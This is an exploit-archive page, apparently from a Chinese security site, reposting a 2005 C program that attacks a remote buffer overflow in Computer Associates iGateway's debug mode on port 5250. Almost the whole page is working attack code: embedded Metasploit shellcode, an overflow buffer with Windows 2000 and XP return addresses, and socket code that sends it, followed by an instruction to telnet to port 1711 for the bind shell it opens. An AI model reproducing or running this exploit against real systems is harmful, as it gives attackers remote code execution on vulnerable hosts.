首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Computer Associates iGateway debug Mode Remote Buffer Overflow Exploit
来源:erikam@gmail.com 作者:erikam 发布时间:2005-10-11  

Computer Associates iGateway "debug" Mode Remote Buffer Overflow Exploit

Port : 5250

/*ca igateway debug remote overflow -egm erikam@gmail.com*/
/*01.30.05*/
#include <stdio.h>
#include <winsock2.h>
#include <errno.h>
#include <windows.h>

const int MAXSIZE = 17110;

char sc[] = //metasploit
"\x6a\x50\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x3d\x19\x6d"
"\xf7\x83\xeb\xfc\xe2\xf4\xc1\x73\x86\xba\xd5\xe0\x92\x08\xc2\x79"
"\xe6\x9b\x19\x3d\xe6\xb2\x01\x92\x11\xf2\x45\x18\x82\x7c\x72\x01"
"\xe6\xa8\x1d\x18\x86\xbe\xb6\x2d\xe6\xf6\xd3\x28\xad\x6e\x91\x9d"
"\xad\x83\x3a\xd8\xa7\xfa\x3c\xdb\x86\x03\x06\x4d\x49\xdf\x48\xfc"
"\xe6\xa8\x19\x18\x86\x91\xb6\x15\x26\x7c\x62\x05\x6c\x1c\x3e\x35"
"\xe6\x7e\x51\x3d\x71\x96\xfe\x28\xb6\x93\xb6\x5a\x5d\x7c\x7d\x15"
"\xe6\x87\x21\xb4\xe6\xb7\x35\x47\x05\x79\x73\x17\x81\xa7\xc2\xcf"
"\x0b\xa4\x5b\x71\x5e\xc5\x55\x6e\x1e\xc5\x62\x4d\x92\x27\x55\xd2"
"\x80\x0b\x06\x49\x92\x21\x62\x90\x88\x91\xbc\xf4\x65\xf5\x68\x73"
"\x6f\x08\xed\x71\xb4\xfe\xc8\xb4\x3a\x08\xeb\x4a\x3e\xa4\x6e\x4a"
"\x2e\xa4\x7e\x4a\x92\x27\x5b\x71\x6b\x58\x5b\x4a\xe4\x16\xa8\x71"
"\xc9\xed\x4d\xde\x3a\x08\xeb\x73\x7d\xa6\x68\xe6\xbd\x9f\x99\xb4"
"\x43\x1e\x6a\xe6\xbb\xa4\x68\xe6\xbd\x9f\xd8\x50\xeb\xbe\x6a\xe6"
"\xbb\xa7\x69\x4d\x38\x08\xed\x8a\x05\x10\x44\xdf\x14\xa0\xc2\xcf"
"\x38\x08\xed\x7f\x07\x93\x5b\x71\x0e\x9a\xb4\xfc\x07\xa7\x64\x30"
"\xa1\x7e\xda\x73\x29\x7e\xdf\x28\xad\x04\x97\xe7\x2f\xda\xc3\x5b"
"\x41\x64\xb0\x63\x55\x5c\x96\xb2\x05\x85\xc3\xaa\x7b\x08\x48\x5d"
"\x92\x21\x66\x4e\x3f\xa6\x6c\x48\x07\xf6\x6c\x48\x38\xa6\xc2\xc9"
"\x05\x5a\xe4\x1c\xa3\xa4\xc2\xcf\x07\x08\xc2\x2e\x92\x27\xb6\x4e"
"\x91\x74\xf9\x7d\x92\x21\x6f\xe6\xbd\x9f\xcd\x93\x69\xa8\x6e\xe6"
"\xbb\x08\xed\x19\x6d\xf7";

int tcp_connect(char *host,int port) {

struct hostent *hp;
struct sockaddr_in addr;
int sock;

if (!(hp=gethostbyname(host))){
fprintf(stderr,"Something died! \n");
return -1;
}

memset(&addr,0,sizeof(addr));
addr.sin_addr=*(struct in_addr*)hp->h_addr;
addr.sin_family=AF_INET;
addr.sin_port=htons(port);

if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0){
fprintf(stderr,"Dead again!\n");
return -1;
}

if((connect(sock,(struct sockaddr *)&addr,sizeof(addr)))<0){
fprintf(stderr,"Dead once more! \n");
return -1;
}
return sock;
}

/*Just supply a target ./caigw-win32 hostname */
int main(int argc, char *argv[])
{
char buffer[MAXSIZE+1];
int i = 0;
int sclen = sizeof(sc), sock = 0;

if(!argv[1])
return 0;

memset(buffer,'\x90',MAXSIZE/2);

memcpy(buffer,"GET",3);

for(i=3;i<24;i++)
memcpy(buffer+i," ",1);
for(i=21;i<423;i++)
buffer[i] = 'A';

/* XP SP2*/
//memcpy(buffer + 423+25,"\xdd\x10\x12\x12",4);
/*W2ksp4 */
memcpy(buffer + 422+25,"\xdd\x10\x12\x12",4);

memcpy(buffer + 460,sc,sclen - 1);
memcpy(buffer + (460 + sclen)," HTTP/1.0\r\n\r\n\r\n",16);
buffer[460+sclen+20] = '\0';

if( (sock = tcp_connect(argv[1],5250)) != -1 )
{
int bytes = 0;

printf("[~] Sending request... \n");
bytes = send(sock,buffer,strlen(buffer),0);
printf("[!] Sent [%d] bytes\n",bytes);
}
else
return -1;

close(sock);
sleep (2);

printf("[@] Now telnet to port 1711\n");
return 0;
}




 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·xine-lib CDDB Client Metadata
·MailEnable Logging Buffer Over
·phpMyAdmin grab_globals.lib.ph
·Microsoft Windows FTP Client F
·Virtools Web PlayerMultiple Vu
·Microsoft Windows Network Conn
·Microsoft Windows Wireless Zer
·Microsoft Collaboration Data O
·ProZilla ftpsearch Results Han
·Lynx Browser NNTP Handling Rem
·PHP-Fusion msg_send SQL Inject
·TYPSoft FTP Server RETR DoS
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved